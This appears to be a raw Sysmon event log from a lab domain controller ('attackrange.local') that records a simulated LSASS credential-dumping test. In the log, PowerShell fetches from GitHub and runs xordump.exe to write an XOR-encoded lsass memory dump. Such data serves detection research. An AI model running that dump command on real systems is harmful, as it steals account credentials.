21:10:30.046{4DB9351A-9DDB-60D3-0B00-00000000CF01}6284464C:\Windows\system32\lsass.exe{4DB9351A-A345-60D3-6306-00000000CF01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025819Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.046{4DB9351A-9DDB-60D3-0B00-00000000CF01}6284464C:\Windows\system32\lsass.exe{4DB9351A-A345-60D3-6306-00000000CF01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000025818Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.046{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E6E9A10AAA63C03D067A7E0FA04D5FA9,SHA256=93472316855643FEFC19A186FD3501DECC020FED797C898251122D110080F9B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000026115Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.936{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=61978826E66E6E9CF187C7137CDEA228,SHA256=DC54FA948B306B5D8B2FE87A4305518E27491065545FC51243EC5F6367CE68DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000026114Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.467{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E12BEDA735D8C9FFCF7A752AC95ECEA8,SHA256=F9CED563DEB43B227A04F35A3A3B62BDE5D11D29BEABD5839FA587E1A6E8CFD3,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000026113Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.490{4DB9351A-A345-60D3-6206-00000000CF01}6784raw.githubusercontent.com0::ffff:185.199.109.133;::ffff:185.199.110.133;::ffff:185.199.111.133;::ffff:185.199.108.133;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x800000000000000026112Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.332{4DB9351A-A347-60D3-6806-00000000CF01}29321420C:\Windows\Temp\xordump.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ntdll.dll+6cd0a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\SYSTEM32\dbgcore.DLL+15a38|C:\Windows\SYSTEM32\dbgcore.DLL+e3f5|C:\Windows\SYSTEM32\dbgcore.DLL+b027|C:\Windows\SYSTEM32\dbgcore.DLL+5db1|C:\Windows\SYSTEM32\dbgcore.DLL+67d3|C:\Windows\Temp\xordump.exe+688be 10341000x800000000000000026111Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.328{4DB9351A-A347-60D3-6806-00000000CF01}29321420C:\Windows\Temp\xordump.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Temp\xordump.exe+688be 23542300x800000000000000026110Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.316{4DB9351A-A347-60D3-6706-00000000CF01}5864ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000026109Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.301{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026108Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.301{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A347-60D3-6806-00000000CF01}2932C:\Windows\Temp\xordump.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000026107Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.301{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026106Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.301{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026105Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.301{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026104Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.301{4DB9351A-A347-60D3-6706-00000000CF01}58642452C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A347-60D3-6806-00000000CF01}2932C:\Windows\Temp\xordump.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9d176dc9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c5eb4f2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c5eb12d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9d0c218b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c5a809f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c60bb11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c5edb20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c5edb20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c5ed9b1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c5de6d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c5ebc13(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c5eb785(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c5eb4f2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c5eb12d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9d0c218b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c5a809f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c60bb11(wow64) 154100x800000000000000026103Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.282{4DB9351A-A347-60D3-6806-00000000CF01}2932C:\Windows\Temp\xordump.exe-----"C:\Windows\Temp\xordump.exe" -out C:\Windows\Temp\lsass-xordump.t1003.001.dmp -x 0x41C:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=2887E395989FF904B70306D49EED5737,SHA256=6B37390CC4C1D730CE2622386C6F4E0B7947A3E86016497C2700931499DC2647,IMPHASH=4035D2883E01D64F3E7A9DCCB1D63AF5{4DB9351A-A347-60D3-6706-00000000CF01}5864C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\Windows\Temp\xordump.exe -out C:\Windows\Temp\lsass-xordump.t1003.001.dmp -x 0x41} 10341000x800000000000000026102Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.254{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A347-60D3-6706-00000000CF01}5864C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026101Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.254{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A347-60D3-6706-00000000CF01}5864C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000026100Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.254{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFE7DC3BE9F1FBC017FF9C3AA609AD08,SHA256=977191DB599C851CE23B433F1FE216311778B1A571ADD3BB8AA092797EB02A74,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000026099Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.191{4DB9351A-9DDB-60D3-0B00-00000000CF01}6284464C:\Windows\system32\lsass.exe{4DB9351A-A347-60D3-6706-00000000CF01}5864C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026098Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.191{4DB9351A-9DDB-60D3-0B00-00000000CF01}6284464C:\Windows\system32\lsass.exe{4DB9351A-A347-60D3-6706-00000000CF01}5864C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000026097Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:10:31.160{4DB9351A-A347-60D3-6706-00000000CF01}5864\PSHost.132689562310882069.5864.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000026096Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.160{4DB9351A-A347-60D3-6706-00000000CF01}5864ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_3ryiyat4.bkz.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000026095Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.493{4DB9351A-A345-60D3-6206-00000000CF01}6784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61544-false185.199.109.133cdn-185-199-109-133.github.com443https 23542300x800000000000000026094Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.145{4DB9351A-A347-60D3-6706-00000000CF01}5864ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_q4ectjd4.c1g.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000026093Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.145{4DB9351A-A347-60D3-6706-00000000CF01}5864C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_q4ectjd4.c1g.ps12021-06-23 21:10:31.145 10341000x800000000000000026092Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.129{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A347-60D3-6706-00000000CF01}5864C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000026091Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.113{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6639A04D876F422B1ABB857DC25A903E,SHA256=66DE97AB5B1467850D59A8F7C1190FE9E764ECBA3DDF06E4C85A4FFADE0A36D7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000026090Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.082{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A347-60D3-6706-00000000CF01}5864C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026089Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.082{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A347-60D3-6706-00000000CF01}5864C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000026088Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.082{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026087Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.082{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026086Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 